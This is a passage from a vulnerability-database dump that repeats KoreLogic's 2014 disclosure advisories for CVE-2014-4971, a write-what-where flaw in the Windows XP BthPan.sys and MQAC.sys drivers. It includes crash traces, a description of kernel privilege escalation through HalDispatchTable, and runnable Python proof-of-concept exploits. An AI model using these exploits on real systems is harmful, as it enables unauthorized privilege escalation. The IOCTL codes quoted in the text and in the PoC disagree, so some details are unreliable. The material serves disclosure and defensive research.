We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\r\n", "edition": 1, "modified": "2014-07-22T00:00:00", "published": "2014-07-22T00:00:00", "id": "SECURITYVULNS:DOC:30943", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30943", "title": "KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-4133", "CVE-2014-4073", "CVE-2014-4140", "CVE-2014-4122", "CVE-2014-4121", "CVE-2014-4127", "CVE-2014-4138", "CVE-2014-4130", "CVE-2014-4141", "CVE-2014-4971", "CVE-2014-4126", "CVE-2014-4137", "CVE-2014-4128", "CVE-2014-4114", "CVE-2014-4129", "CVE-2014-4113", "CVE-2014-4148", "CVE-2014-4134", "CVE-2014-4132", "CVE-2014-4075", "CVE-2014-4115"], "description": "Restrictions bypass and memory corruptions in Internet Explorer, .Net code execution, TrueType embedded fonts code execution, OLE code execution, message queue service and FAT32 driver privilege escalation.", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:VULN:14016", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14016", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:17:07", "description": "No description provided by source.", "published": "2014-07-24T00:00:00", "type": "seebug", "title": "Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", 
"bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87151", "id": "SSV:87151", "sourceData": "\n """\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. 
In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n\r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n\r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. 
InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. 
Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any "up-platform" products. Says they\r\n are investigating embedded platforms. 
Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. 
Proof of Concept\r\n"""\r\n\r\n#!/usr/bin/python2\r\n#\r\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n# Matt Bergin (KoreLogic / Smash the Stack) \r\n# CVE-2014-4971\r\n#\r\nfrom ctypes import *\r\nfrom struct import pack\r\nfrom os import getpid,system\r\nfrom sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p("\\x00"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n \r\n handle = CreateFileA("\\\\\\\\.\\\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n\tprint "[!] 
Could not open handle to BthPan"\r\n\texit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\\xcc\\xcc\\xcc\\xcc"+"\\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\n"""\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. 
We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87151"}, {"lastseen": "2017-11-19T13:17:04", "description": "No description provided by source.", "published": "2014-07-24T00:00:00", "type": "seebug", "title": "Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87150", "id": "SSV:87150", "sourceData": "\n Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-003\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. 
Technical Description\r\n\r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n\r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n\r\nFOLLOWUP_IP: \r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n mqac!AC2QM+0x5d storing the dword in ebx to the address held in\r\n esi, i.e. the user-supplied OutputBuffer address; the faulting\r\n write is in the mqac driver itself rather than in\r\n IopCompleteRequest(). InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. 
The esi register contains the invalid address\r\n provided during the fuzz testcase (esi=ffff0000 in the frame\r\n below; edi is not used by the faulting instruction).\r\n\r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. 
Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an "up-platform"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. 
Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n\r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them :)\r\n def getBase(name=None):\r\n retArray = c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p("\\x00"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n\r\n handle = 
CreateFileA("\\\\\\\\.\\\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print "[+] Handle \\\\\\\\.\\\\MQAC @ %s" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\\x50\\x00\\x00\\x00"+"\\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, "\\xcc", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print "[+] HalDispatchTable+0x4 overwritten"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. 
We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87150"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "edition": 1, "published": "2014-07-21T00:00:00", "title": "Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "EXPLOITPACK:6C1249C6408DDF548B106905FC847650", "href": "", "sourceData": "\"\"\"\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-002\nPublication Date: 2014-07-18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: Bluetooth Personal Area Networking\n Affected Versions: 5.1.2600.5512\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the BthPan module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the BthPan device\n and subsequently make DeviceIoControlFile() calls into that\n device. 
During the IRP handler routine for 0x0012b814 the user\n provided OutputBuffer address is not validated. (Note: the\n proof of concept in section 7 issues control code 0x0012d814,\n which differs from the value quoted here; confirm the code\n against the driver before relying on either.) This allows an\n attacker to specify an arbitrary address and write\n (or overwrite) the memory residing at the specified address.\n This is classically known as a write-what-where vulnerability and\n has well known exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our fuzzing\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\n call is 0xffff0000.\n\nSTACK_TEXT:\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\nWARNING: Stack unwind information not available. 
Following frames may be wrong.\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the bthpan driver.\n\nFOLLOWUP_IP:\nbthpan!BthpanReqAdd+16b\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\nErrCode = 00000002\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\nnt!IopCompleteRequest+0x92:\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in BthPan it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. 
